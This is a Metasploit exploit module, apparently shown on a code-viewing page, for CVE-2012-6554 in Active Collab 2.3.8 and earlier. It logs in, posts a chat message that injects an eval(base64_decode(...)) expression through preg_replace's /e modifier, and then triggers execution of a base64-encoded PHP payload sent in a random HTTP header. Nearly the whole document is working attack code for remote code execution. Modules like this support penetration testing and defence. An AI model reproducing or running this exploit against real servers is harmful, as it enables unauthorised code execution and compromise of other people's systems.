Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
class MetasploitModule < Msf::Exploit::Remote
7
  Rank = ExcellentRanking
8

9
  include Msf::Exploit::Remote::HttpClient
10

11
  def initialize(info={})
12
    super(update_info(info,
13
      'Name'           => 'Active Collab "chat module" Remote PHP Code Injection Exploit',
14
      'Description'    => %q{
15
        This module exploits an arbitrary code injection vulnerability in the
16
        chat module that is part of Active Collab versions 2.3.8 and earlier by
17
        abusing a preg_replace() using the /e modifier and its replacement
18
        string using double quotes. The vulnerable function can be found in
19
        activecollab/application/modules/chat/functions/html_to_text.php.
20
      },
21
      'License'        => MSF_LICENSE,
22
      'Author'         =>
23
        [
24
          'mr_me <steventhomasseeley[at]gmail.com>',  # vuln discovery & msf module
25
        ],
26
      'References'     =>
27
        [
28
          ['CVE', '2012-6554'],
29
          ['OSVDB', '81966'],
30
          ['URL', 'http://www.activecollab.com/downloads/category/4/package/62/releases'],
31
        ],
32
      'Privileged'     => false,
33
      'Payload'        =>
34
        {
35
          'Keys'        => ['php'],
36
          'Space'       => 4000,
37
          'DisableNops' => true,
38
        },
39
      'Platform'       => ['php'],
40
      'Arch'           => ARCH_PHP,
41
      'Targets'        => [['Automatic',{}]],
42
      'DisclosureDate' => '2012-05-30',
43
      'DefaultTarget'  => 0))
44

45
    register_options(
46
      [
47
        OptString.new('URI',[true, "The path to the ActiveCollab installation", "/"]),
48
        OptString.new('USER',[true, "The username (e-mail) to authenticate with"]),
49
        OptString.new('PASS',[true, "The password to authenticate with"])
50
      ])
51
  end
52

53
  def check
54

55
    login_path = "public/index.php?path_info=login&re_route=homepage"
56
    uri = normalize_uri(datastore['URI'])
57
    uri += (normalize_uri(datastore['URI'])[-1, 1] == "/") ? login_path : "/#{login_path}"
58

59
    cms = send_request_raw({'uri' => uri}, 25)
60

61
    uri = normalize_uri(datastore['URI'])
62
    uri += (normalize_uri(datastore['URI'])[-1, 1] == "/") ? 'public/assets/modules/chat/' : '/public/assets/modules/chat/'
63

64
    chat = send_request_raw({'uri' => uri}, 25)
65

66
    # cant detect the version here
67
    if (cms and cms.body =~ /powered by activeCollab/)
68
      # detect the chat module
69
      if (chat and chat.code == 200)
70
        return Exploit::CheckCode::Detected
71
      end
72
    end
73
    return Exploit::CheckCode::Safe
74
  end
75

76
  def exploit
77
    user = datastore['USER']
78
    pass = datastore['PASS']
79
    p = Rex::Text.encode_base64(payload.encoded)
80
    header = rand_text_alpha_upper(3)
81
    login_uri = normalize_uri(datastore['URI'])
82
    login_uri += (normalize_uri(datastore['URI'])[-1, 1] == "/") ? 'public/index.php?path_info=login' : '/public/index.php?path_info=login'
83

84
    # login
85
    res = send_request_cgi({
86
      'method'    => 'POST',
87
      'uri'       => login_uri,
88
      'vars_post' =>
89
        {
90
          'login[email]'      => user,
91
          'login[password]'   => pass,
92
          'submitted'         => "submitted",
93
        }
94
      }, 40)
95

96
    # response handling
97
    if res and res.code == 302
98
      if res.get_cookies =~ /ac_ActiveCollab_sid_[a-zA-Z0-9]+=(.*); expires=/
99
        acsession = $1
100
      end
101
    elsif res and res.body =~ /Failed to log you in/
102
      print_error("#{rhost}:#{rport} Could not login to the target application as #{user}:#{pass}")
103
    elsif res and res.code != 200 or res.code != 302
104
      print_error("#{rhost}:#{rport} Server returned a failed status code: (#{res.code})")
105
    end
106

107
    # injection
108
    iuri = normalize_uri(datastore['URI'])
109
    iuri += (normalize_uri(datastore['URI'])[-1, 1] == "/") ? 'index.php' : '/index.php'
110
    iuri << "?path_info=chat/add_message&async=1"
111
    phpkode = "{\${eval(base64_decode(\$_SERVER[HTTP_#{header}]))}}"
112
    injection = "<th>\");#{phpkode}</th>"
113
    cookies = "ac_ActiveCollab_sid_eaM4h3LTIZ=#{acsession}"
114
    res = send_request_cgi({
115
      'method'  => 'POST',
116
      'uri'     => iuri,
117
      'headers' =>
118
        {
119
          'cookie'  => cookies
120
        },
121
      'vars_post' =>
122
        {
123
          'submitted'                  => "submitted",
124
          'message[message_text]'      => injection,
125
          'message[chat_id]'           => "1",
126
          'message[posted_to_user_id]' => "all"
127
        }
128
    }, 25)
129

130
    euri = normalize_uri(datastore['URI'])
131
    euri += (normalize_uri(datastore['URI'])[-1, 1] == "/") ? 'public/index.php' : '/public/index.php'
132
    euri << "?path_info=/chat/history/1"
133

134
    # execution
135
    res = send_request_cgi({
136
      'method'  => 'POST',
137
      'uri'     => euri,
138
      'headers' =>
139
        {
140
          header    => p,
141
          'cookie'  => cookies
142
        }
143
    })
144
  end
145
end
146

147